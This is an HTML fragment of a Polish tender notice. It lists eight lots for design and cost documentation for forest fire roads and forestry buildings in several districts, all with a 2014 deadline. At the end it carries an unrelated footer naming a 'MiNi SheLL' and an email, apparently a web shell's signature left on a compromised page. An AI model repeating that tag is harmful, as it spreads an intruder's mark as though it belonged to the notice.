<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej oraz nadzór inwestorski dla zadania pn.: Przebudowa drogi leśnej pożarowej nr 10 na terenie Leśnictwa Skarlin, gm. Biskupiec - Etap III o dł. ~4885mb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Skład dokumentacji:

-4 egz. Projektu budowlanego
-1 egz. Projektu budowlanego do celów opiniodawczych 
-2 egz. Specyfikacji technicznej wykonania i odbioru robót,
-1 egz. Przedmiaru robót,
-1 egz. Kosztorysu ofertowego,
-1 egz. Kosztorysu inwestorskiego,
-Zapis elektroniczny na nośniku CD.

2. W tym celu należy wykonać:
-mapy do celów projektowych
-projekt przebudowy drogi leśnej
-przedmiar robót budowlanych,
-kosztorysy inwestorskie budowlane,
-kosztorysy ofertowe budowlane,
-specyfikację techniczną wykonania i odbioru robót,
-ewentualne niezbędne uzgodnienia dokumentacji z właściwymi organami, w tym uzyskanie opinii od rzeczoznawcy p.poż.
-skompletowanie dokumentacji i dostosowanie do uzyskania pozwolenia na budowę i środków z budżetu Unii Europejskiej.
-nadzór inwestorski nad w/w robotami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej oraz nadzór inwestorski dla zadania pn.: Przebudowa drogi leśnej pożarowej nr 1 na terenie Leśnictwa Łunawy, gm. Stolno o dł. ~1091mb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Skład dokumentacji:

-4 egz. Projektu budowlanego 
-1 egz. Projektu budowlanego do celów opiniodawczych 
-2 egz. Specyfikacji technicznej wykonania i odbioru robót,
-1 egz. Przedmiaru robót,
-1 egz. Kosztorysu ofertowego,
-1 egz. Kosztorysu inwestorskiego,
-Zapis elektroniczny na nośniku CD.

2. W tym celu należy wykonać:
-mapy do celów projektowych
-projekt przebudowy drogi leśnej
-przedmiar robót budowlanych,
-kosztorysy inwestorskie budowlane,
-kosztorysy ofertowe budowlane,
-specyfikację techniczną wykonania i odbioru robót,
-ewentualne niezbędne uzgodnienia dokumentacji z właściwymi organami, w tym uzyskanie opinii od rzeczoznawcy p.poż.
-skompletowanie dokumentacji i dostosowanie do uzyskania pozwolenia na budowę i środków z budżetu Unii Europejskiej.
-nadzór inwestorski nad w/w robotami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej dla zadania pn.: Przebudowa drogi leśnej pożarowej nr 3 na terenie Leśnictwa Zakurzewo, gm. Grudziądz o dł. ~2806mb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Skład dokumentacji:

-4 egz. Projektu budowlanego
-1 egz. Projektu budowlanego do celów opiniodawczych 
-2 egz. Specyfikacji technicznej wykonania i odbioru robót,
-1 egz. Przedmiaru robót,
-1 egz. Kosztorysu ofertowego,
-1 egz. Kosztorysu inwestorskiego,
-Zapis elektroniczny na nośniku CD.

2. W tym celu należy wykonać:
-mapy do celów projektowych
-projekt przebudowy drogi leśnej
-przedmiar robót budowlanych,
-kosztorysy inwestorskie budowlane,
-kosztorysy ofertowe budowlane,
-specyfikację techniczną wykonania i odbioru robót,
-ewentualne niezbędne uzgodnienia dokumentacji z właściwymi organami, w tym uzyskanie opinii od rzeczoznawcy p.poż.
-skompletowanie dokumentacji i dostosowanie do uzyskania pozwolenia na budowę i środków z budżetu Unii Europejskiej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej dla zadania pn.: Przebudowa drogi leśnej pożarowej nr 5 na terenie Leśnictwa Dusocin i Zakurzewo, gm. Grudziądz o dł. ~3748mb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Skład dokumentacji:

-4 egz. Projektu budowlanego
-1 egz. Projektu budowlanego do celów opiniodawczych 
-2 egz. Specyfikacji technicznej wykonania i odbioru robót,
-1 egz. Przedmiaru robót,
-1 egz. Kosztorysu ofertowego,
-1 egz. Kosztorysu inwestorskiego,
-Zapis elektroniczny na nośniku CD.

2. W tym celu należy wykonać:
-mapy do celów projektowych
-projekt przebudowy drogi leśnej
-przedmiar robót budowlanych,
-kosztorysy inwestorskie budowlane,
-kosztorysy ofertowe budowlane,
-specyfikację techniczną wykonania i odbioru robót,
-ewentualne niezbędne uzgodnienia dokumentacji z właściwymi organami, w tym uzyskanie opinii od rzeczoznawcy p.poż.
-skompletowanie dokumentacji i dostosowanie do uzyskania pozwolenia na budowę i środków z budżetu Unii Europejskiej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej oraz nadzór inwestorski dla zadania pn.: Modernizacja budynku mieszkalnego w Leśnictwie Łunawy w m.Wabcz Łyniec, gm. Stolno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Skład dokumentacji:

-4 egz. Dokumentacji projektowej (proj. bud. i branżowe) 
-2 egz. Specyfikacji technicznej wykonania i odbioru robót,
-1 egz. Przedmiaru robót,
-1 egz. Kosztorysu ofertowego,
-1 egz. Kosztorysu inwestorskiego,
-Zapis elektroniczny na nośniku CD.

2. W tym celu należy wykonać:

-mapy do celów projektowych
-inwentaryzację budowlaną wraz z oceną stanu technicznego,
-projekt budowlany wymiany konstrukcji dachowej i pokrycia dachowego wraz z nowym podziałem pomieszczeń na piętrze budynku,
-przedmiar robót budowlanych,
-kosztorysy inwestorskie budowlane i branżowe,
-kosztorysy ofertowe budowlane i branżowe,
-specyfikację techniczną wykonania i odbioru robót,
-ewentualne niezbędne uzgodnienia dokumentacji z właściwymi organami, 
-skompletowanie dokumentacji i dostosowanie do uzyskania pozwolenia na budowę,
-nadzór inwestorski nad w/w robotami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej oraz nadzór inwestorski dla zadania pn.: Modernizacja budynków gospodarczych wraz z zagospodarowaniem terenu przy budynkach w Leśnictwie Zwierzyniec w m.Szembruk, gm. Rogóźno.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Skład dokumentacji:

-4 egz. Projektu robót konserwatorskich - jeżeli będą wymagane
-4 egz. Dokumentacji projektowej (proj. bud. i branżowe)
-2 egz. Specyfikacji technicznej wykonania i odbioru robót,
-1 egz. Przedmiaru robót,
-1 egz. Kosztorysu ofertowego,
-1 egz. Kosztorysu inwestorskiego,
-Zapis elektroniczny na nośniku CD.

2. W tym celu należy wykonać:

b)Dla budynku gospodarczo-garażowego:
-mapy do celów projektowych
-inwentaryzację budowlaną wraz z oceną stanu technicznego,
-projekt przebudowy budynku gospodarczo-garażowego na budynek gospodarczy z garażem dwustanowiskowym wraz z wymianą pokrycia dachowego oraz częściową wymianą stropu,
-projekt wewnętrznej i zewnętrznej instalacji elektrycznej,
-przedmiar robót budowlanych i branżowych,
-kosztorysy inwestorskie budowlane i branżowe,
-kosztorysy ofertowe budowlane i branżowe,
-specyfikację techniczną wykonania i odbioru robót,
-ewentualne niezbędne uzgodnienia dokumentacji z właściwymi organami,
-skompletowanie dokumentacji i dostosowanie do uzyskania pozwolenia na budowę,
-nadzór inwestorski nad w/w robotami.
c)Dla budynku stodoły drewnianej:
-mapy do celów projektowych - jeżeli będą wymagane
-projekt lub opracowanie techniczne wymiany pokrycia dachowego wraz z robotami towarzyszącymi,
-projekt lub opracowanie techniczne rozbiórki przybudówki drewnianej krytej płytami azbestowo-cementowymi,
-przedmiar robót budowlanych,
-kosztorys inwestorski budowlany,
-kosztorys ofertowy budowlany,
-specyfikację techniczną wykonania i odbioru robót,
-ewentualne niezbędne uzgodnienia dokumentacji z właściwymi organami,
-skompletowanie dokumentacji i dostosowanie do uzyskania pozwolenia lub zgłoszenia,
-nadzór inwestorski nad w/w robotami.

d)Dla zagospodarowania terenu przy budynkach

-mapy do celów projektowych - jeżeli będą wymagane
-projekt lub opracowanie techniczne odprowadzenia wody z terenu podwórza, utwardzenie terenu płytami ażurowymi z betonu i kostki polbruk, uzupełnienie ogrodzenia,
-przedmiar robót budowlanych,
-kosztorys inwestorski budowlany,
-kosztorys ofertowy budowlany,
-specyfikację techniczną wykonania i odbioru robót,
-ewentualne niezbędne uzgodnienia dokumentacji z właściwymi organami,
-skompletowanie dokumentacji i dostosowanie do uzyskania pozwolenia lub zgłoszenia,
-nadzór inwestorski nad w/w robotami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej oraz nadzór inwestorski dla zadania pn.: Modernizacja budynków gospodarczych w Leśnictwie Lisnowo w m.Partęczyny, Gm. Świecie n/Osą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Skład dokumentacji:

-4 egz. Dokumentacji projektowej lub opracowania technicznego
-2 egz. Specyfikacji technicznej wykonania i odbioru robót,
-1 egz. Przedmiaru robót,
-1 egz. Kosztorysu ofertowego,
-1 egz. Kosztorysu inwestorskiego,
-Zapis elektroniczny na nośniku CD.

2. W tym celu należy wykonać:

e)Dla budynku stodoły drewnianej:
-mapy do celów projektowych - jeżeli będą wymagane
-projekt lub opracowanie techniczne wymiany pokrycia dachowego wraz z robotami towarzyszącymi,
-przedmiar robót budowlanych,
-kosztorys inwestorski budowlany,
-kosztorys ofertowy budowlany,
-specyfikację techniczną wykonania i odbioru robót,
-ewentualne niezbędne uzgodnienia dokumentacji z właściwymi organami,
-skompletowanie dokumentacji i dostosowanie do uzyskania pozwolenia lub zgłoszenia,
-nadzór inwestorski nad w/w robotami.




b) Dla budynku drwalni drewnianej:
-mapy do celów projektowych - jeżeli będą wymagane
-projekt lub opracowanie techniczne wymiany pokrycia dachowego wraz z robotami towarzyszącymi,
-przedmiar robót budowlanych,
-kosztorys inwestorski budowlany,
-kosztorys ofertowy budowlany,
-specyfikację techniczną wykonania i odbioru robót,
-ewentualne niezbędne uzgodnienia dokumentacji z właściwymi organami,
-skompletowanie dokumentacji i dostosowanie do uzyskania pozwolenia lub zgłoszenia,
-nadzór inwestorski nad w/w robotami.

c) Dla budynku gospodarczego-magazynu:
-nadzór inwestorski nad n/w robotami:
naprawa konstrukcji i pokrycia dachu wraz z robotami towarzyszącymi..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Wykonanie dokumentacji projektowo-kosztorysowej oraz nadzór inwestorski dla zadania pn.: Rozbiórka budynku gospodarczego-agregatorni w m.Orle, Gm. Gruta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Skład dokumentacji:

-4 egz. Dokumentacji projektowej lub opracowania technicznego 
-2 egz. Specyfikacji technicznej wykonania i odbioru robót,
-1 egz. Przedmiaru robót,
-1 egz. Kosztorysu ofertowego,
-1 egz. Kosztorysu inwestorskiego,
-Zapis elektroniczny na nośniku CD.

2. W tym celu należy wykonać:
-mapy do celów projektowych - jeżeli będą wymagane
-projekt lub opracowanie techniczne rozbiórki,
-przedmiar robót budowlanych,
-kosztorys inwestorski budowlany,
-kosztorys ofertowy budowlany,
-specyfikację techniczną wykonania i odbioru robót,
-ewentualne niezbędne uzgodnienia dokumentacji z właściwymi organami,
-skompletowanie dokumentacji i dostosowanie do uzyskania pozwolenia lub zgłoszenia,
-nadzór inwestorski nad w/w robotami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com